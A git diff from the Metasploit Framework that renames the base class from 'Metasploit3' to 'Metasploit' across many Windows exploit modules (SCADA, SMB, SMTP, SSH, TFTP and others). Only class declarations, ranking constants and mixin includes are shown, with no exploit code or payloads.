a/modules/exploits/windows/scada/scadapro_cmdexe.rb b/modules/exploits/windows/scada/scadapro_cmdexe.rb index 4a8e6d2e04..c7818c370f 100644 --- a/modules/exploits/windows/scada/scadapro_cmdexe.rb +++ b/modules/exploits/windows/scada/scadapro_cmdexe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb b/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb index 1360a3e0d3..96f573690d 100644 --- a/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb +++ b/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/winlog_runtime.rb b/modules/exploits/windows/scada/winlog_runtime.rb index 9dc542a090..16e0eda2c8 100644 --- a/modules/exploits/windows/scada/winlog_runtime.rb +++ b/modules/exploits/windows/scada/winlog_runtime.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/winlog_runtime_2.rb b/modules/exploits/windows/scada/winlog_runtime_2.rb index f77cd30561..59820d5a62 100644 --- a/modules/exploits/windows/scada/winlog_runtime_2.rb +++ b/modules/exploits/windows/scada/winlog_runtime_2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb b/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb index 50988b7a1e..1fc5626c3a 100644 --- a/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb +++ b/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb b/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb index 18c48e6ff9..e7be802d39 100644 --- a/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb +++ b/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb b/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb index 5cef7ab51a..24901fe281 100644 --- a/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb +++ b/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb b/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb index 4766596f52..b18b859cf0 100644 --- a/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb +++ b/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/sip/aim_triton_cseq.rb b/modules/exploits/windows/sip/aim_triton_cseq.rb index 12e2bf20af..46b746a108 100644 --- a/modules/exploits/windows/sip/aim_triton_cseq.rb +++ b/modules/exploits/windows/sip/aim_triton_cseq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/sip/sipxezphone_cseq.rb b/modules/exploits/windows/sip/sipxezphone_cseq.rb index c26d264abb..31939b2fd7 100644 --- a/modules/exploits/windows/sip/sipxezphone_cseq.rb +++ b/modules/exploits/windows/sip/sipxezphone_cseq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/sip/sipxphone_cseq.rb b/modules/exploits/windows/sip/sipxphone_cseq.rb index ae66736206..0295a55654 100644 --- a/modules/exploits/windows/sip/sipxphone_cseq.rb +++ b/modules/exploits/windows/sip/sipxphone_cseq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/smb/generic_smb_dll_injection.rb b/modules/exploits/windows/smb/generic_smb_dll_injection.rb index 760bcfd6d2..bf086ff964 100644 --- a/modules/exploits/windows/smb/generic_smb_dll_injection.rb +++ b/modules/exploits/windows/smb/generic_smb_dll_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::SMB::Server::Share diff --git a/modules/exploits/windows/smb/group_policy_startup.rb b/modules/exploits/windows/smb/group_policy_startup.rb index 8157d00f14..3363ca58d4 100644 --- a/modules/exploits/windows/smb/group_policy_startup.rb +++ b/modules/exploits/windows/smb/group_policy_startup.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::SMB::Server::Share diff --git a/modules/exploits/windows/smb/ipass_pipe_exec.rb b/modules/exploits/windows/smb/ipass_pipe_exec.rb index 67eaa9baf9..737e4e992e 100644 --- a/modules/exploits/windows/smb/ipass_pipe_exec.rb +++ b/modules/exploits/windows/smb/ipass_pipe_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB::Client::Authenticated diff --git a/modules/exploits/windows/smb/ms03_049_netapi.rb b/modules/exploits/windows/smb/ms03_049_netapi.rb index 2b1c6f7272..805f8043a5 100644 --- a/modules/exploits/windows/smb/ms03_049_netapi.rb +++ b/modules/exploits/windows/smb/ms03_049_netapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms04_007_killbill.rb b/modules/exploits/windows/smb/ms04_007_killbill.rb index 817f32c8d2..eed99c23fa 100644 --- a/modules/exploits/windows/smb/ms04_007_killbill.rb +++ b/modules/exploits/windows/smb/ms04_007_killbill.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/windows/smb/ms04_011_lsass.rb b/modules/exploits/windows/smb/ms04_011_lsass.rb index 8c9150e72f..5fc2d84a83 100644 --- a/modules/exploits/windows/smb/ms04_011_lsass.rb +++ b/modules/exploits/windows/smb/ms04_011_lsass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking # diff --git a/modules/exploits/windows/smb/ms04_031_netdde.rb b/modules/exploits/windows/smb/ms04_031_netdde.rb index 63bb2284c4..6d304f6b60 100644 --- a/modules/exploits/windows/smb/ms04_031_netdde.rb +++ b/modules/exploits/windows/smb/ms04_031_netdde.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms05_039_pnp.rb b/modules/exploits/windows/smb/ms05_039_pnp.rb index c607558b2b..a5e292b487 100644 --- a/modules/exploits/windows/smb/ms05_039_pnp.rb +++ b/modules/exploits/windows/smb/ms05_039_pnp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb index ad523283c1..d691106375 100644 --- a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb +++ b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Egghunter diff --git a/modules/exploits/windows/smb/ms06_025_rras.rb b/modules/exploits/windows/smb/ms06_025_rras.rb index 73bf7bd392..eca2b8a106 100644 --- a/modules/exploits/windows/smb/ms06_025_rras.rb +++ b/modules/exploits/windows/smb/ms06_025_rras.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms06_040_netapi.rb b/modules/exploits/windows/smb/ms06_040_netapi.rb index 335165a58d..e9b29235a8 100644 --- a/modules/exploits/windows/smb/ms06_040_netapi.rb +++ b/modules/exploits/windows/smb/ms06_040_netapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms06_066_nwapi.rb b/modules/exploits/windows/smb/ms06_066_nwapi.rb index 17b58d9077..87a5d01d4b 100644 --- a/modules/exploits/windows/smb/ms06_066_nwapi.rb +++ b/modules/exploits/windows/smb/ms06_066_nwapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Egghunter diff --git a/modules/exploits/windows/smb/ms06_066_nwwks.rb b/modules/exploits/windows/smb/ms06_066_nwwks.rb index e5104d14c2..4f5a4b8282 100644 --- a/modules/exploits/windows/smb/ms06_066_nwwks.rb +++ b/modules/exploits/windows/smb/ms06_066_nwwks.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms06_070_wkssvc.rb b/modules/exploits/windows/smb/ms06_070_wkssvc.rb index 059ff04131..33d43c64fe 100644 --- a/modules/exploits/windows/smb/ms06_070_wkssvc.rb +++ b/modules/exploits/windows/smb/ms06_070_wkssvc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking # Requires valid/working DOMAIN + DC include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb b/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb index 651de13296..8e1cfc90de 100644 --- a/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb +++ b/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb index a1e8de1191..3bbdaf9191 100644 --- a/modules/exploits/windows/smb/ms08_067_netapi.rb +++ b/modules/exploits/windows/smb/ms08_067_netapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb b/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb index 3cf78788c9..ac5c6f616c 100644 --- a/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb +++ b/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb index 7afff33985..9d8e1c01b1 100644 --- a/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/smb/ms10_061_spoolss.rb b/modules/exploits/windows/smb/ms10_061_spoolss.rb index b1b688e620..aedb3e2689 100644 --- a/modules/exploits/windows/smb/ms10_061_spoolss.rb +++ b/modules/exploits/windows/smb/ms10_061_spoolss.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/windows_error' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb b/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb index 780604be72..3898e01700 100644 --- a/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb b/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb index b9c0a1baea..e0e3801c00 100644 --- a/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb +++ b/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index 7b7c816897..34314cca6e 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb @@ -15,7 +15,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb index 17727557a0..219d8ae1db 100644 --- a/modules/exploits/windows/smb/psexec_psh.rb +++ b/modules/exploits/windows/smb/psexec_psh.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking # Exploit mixins should be called first diff --git a/modules/exploits/windows/smb/smb_relay.rb b/modules/exploits/windows/smb/smb_relay.rb index 869aa183ff..7f195cc810 100644 --- a/modules/exploits/windows/smb/smb_relay.rb +++ b/modules/exploits/windows/smb/smb_relay.rb @@ -19,7 +19,7 @@ under: require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB::Server diff --git a/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb b/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb index ceea4829b0..83160cb256 100644 --- a/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb +++ b/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb index 07925d6526..b84bad0f50 100644 --- a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb +++ b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/smtp/mercury_cram_md5.rb b/modules/exploits/windows/smtp/mercury_cram_md5.rb index 27ac045d5b..dcd5dcf9f3 100644 --- a/modules/exploits/windows/smtp/mercury_cram_md5.rb +++ b/modules/exploits/windows/smtp/mercury_cram_md5.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb index 3fbf61a555..b2bf3b398c 100644 --- a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb +++ b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/smtp/njstar_smtp_bof.rb b/modules/exploits/windows/smtp/njstar_smtp_bof.rb index bbf06483f1..28e74b25a0 100644 --- a/modules/exploits/windows/smtp/njstar_smtp_bof.rb +++ b/modules/exploits/windows/smtp/njstar_smtp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/smtp/wmailserver.rb b/modules/exploits/windows/smtp/wmailserver.rb index 6d393979a1..4b8e6c6fea 100644 --- a/modules/exploits/windows/smtp/wmailserver.rb +++ b/modules/exploits/windows/smtp/wmailserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/smtp/ypops_overflow1.rb b/modules/exploits/windows/smtp/ypops_overflow1.rb index 3b8450c140..682f60c285 100644 --- a/modules/exploits/windows/smtp/ypops_overflow1.rb +++ b/modules/exploits/windows/smtp/ypops_overflow1.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Smtp diff --git a/modules/exploits/windows/ssh/freeftpd_key_exchange.rb b/modules/exploits/windows/ssh/freeftpd_key_exchange.rb index d851559c2c..3bfe9f2107 100644 --- a/modules/exploits/windows/ssh/freeftpd_key_exchange.rb +++ b/modules/exploits/windows/ssh/freeftpd_key_exchange.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ssh/freesshd_authbypass.rb b/modules/exploits/windows/ssh/freesshd_authbypass.rb index e53bb028ea..9c0134cacf 100644 --- a/modules/exploits/windows/ssh/freesshd_authbypass.rb +++ b/modules/exploits/windows/ssh/freesshd_authbypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ssh/freesshd_key_exchange.rb b/modules/exploits/windows/ssh/freesshd_key_exchange.rb index 57e154860a..0ccd1cd1c2 100644 --- a/modules/exploits/windows/ssh/freesshd_key_exchange.rb +++ b/modules/exploits/windows/ssh/freesshd_key_exchange.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ssh/putty_msg_debug.rb b/modules/exploits/windows/ssh/putty_msg_debug.rb index 73b305f2a4..32960a3708 100644 --- a/modules/exploits/windows/ssh/putty_msg_debug.rb +++ b/modules/exploits/windows/ssh/putty_msg_debug.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ssh/securecrt_ssh1.rb b/modules/exploits/windows/ssh/securecrt_ssh1.rb index df985f1448..71895ffc6d 100644 --- a/modules/exploits/windows/ssh/securecrt_ssh1.rb +++ b/modules/exploits/windows/ssh/securecrt_ssh1.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ssh/sysax_ssh_username.rb b/modules/exploits/windows/ssh/sysax_ssh_username.rb index 4f9dde83ce..cb0ad19c57 100644 --- a/modules/exploits/windows/ssh/sysax_ssh_username.rb +++ b/modules/exploits/windows/ssh/sysax_ssh_username.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ssl/ms04_011_pct.rb b/modules/exploits/windows/ssl/ms04_011_pct.rb index 9a437f9cab..da1f26262b 100644 --- a/modules/exploits/windows/ssl/ms04_011_pct.rb +++ b/modules/exploits/windows/ssl/ms04_011_pct.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb index 3106ce456d..d803098dbe 100644 --- a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb +++ b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh diff --git a/modules/exploits/windows/telnet/goodtech_telnet.rb b/modules/exploits/windows/telnet/goodtech_telnet.rb index ea55e3c541..f479980932 100644 --- a/modules/exploits/windows/telnet/goodtech_telnet.rb +++ b/modules/exploits/windows/telnet/goodtech_telnet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/tftp/attftp_long_filename.rb b/modules/exploits/windows/tftp/attftp_long_filename.rb index 9f54353a9c..5cc6d5fcee 100644 --- a/modules/exploits/windows/tftp/attftp_long_filename.rb +++ b/modules/exploits/windows/tftp/attftp_long_filename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/distinct_tftp_traversal.rb b/modules/exploits/windows/tftp/distinct_tftp_traversal.rb index 49588e2655..1c0354acd1 100644 --- a/modules/exploits/windows/tftp/distinct_tftp_traversal.rb +++ b/modules/exploits/windows/tftp/distinct_tftp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Rex::Proto::TFTP diff --git a/modules/exploits/windows/tftp/dlink_long_filename.rb b/modules/exploits/windows/tftp/dlink_long_filename.rb index c8d78b0862..ef3f6a36b0 100644 --- a/modules/exploits/windows/tftp/dlink_long_filename.rb +++ b/modules/exploits/windows/tftp/dlink_long_filename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/futuresoft_transfermode.rb b/modules/exploits/windows/tftp/futuresoft_transfermode.rb index 410c818099..ae5f2b1be2 100644 --- a/modules/exploits/windows/tftp/futuresoft_transfermode.rb +++ b/modules/exploits/windows/tftp/futuresoft_transfermode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb b/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb index 0e3e0d5811..c5d86742f1 100644 --- a/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb +++ b/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Rex::Proto::TFTP diff --git a/modules/exploits/windows/tftp/opentftp_error_code.rb b/modules/exploits/windows/tftp/opentftp_error_code.rb index 0949f8ff23..50c3643b9c 100644 --- a/modules/exploits/windows/tftp/opentftp_error_code.rb +++ b/modules/exploits/windows/tftp/opentftp_error_code.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb b/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb index 2183c12283..71d9bb14a4 100644 --- a/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb +++ b/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/tftpd32_long_filename.rb b/modules/exploits/windows/tftp/tftpd32_long_filename.rb index 119de0ce1a..2bd828bee9 100644 --- a/modules/exploits/windows/tftp/tftpd32_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpd32_long_filename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb index 75131b6e09..04eb00dd11 100644 --- a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb b/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb index 3cbd5bf1d0..35d08a6431 100644 --- a/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb +++ b/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb b/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb index a02cbb277c..be80d60bdf 100644 --- a/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb +++ b/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/unicenter/cam_log_security.rb b/modules/exploits/windows/unicenter/cam_log_security.rb index 4a673fd767..9be1e50c40 100644 --- 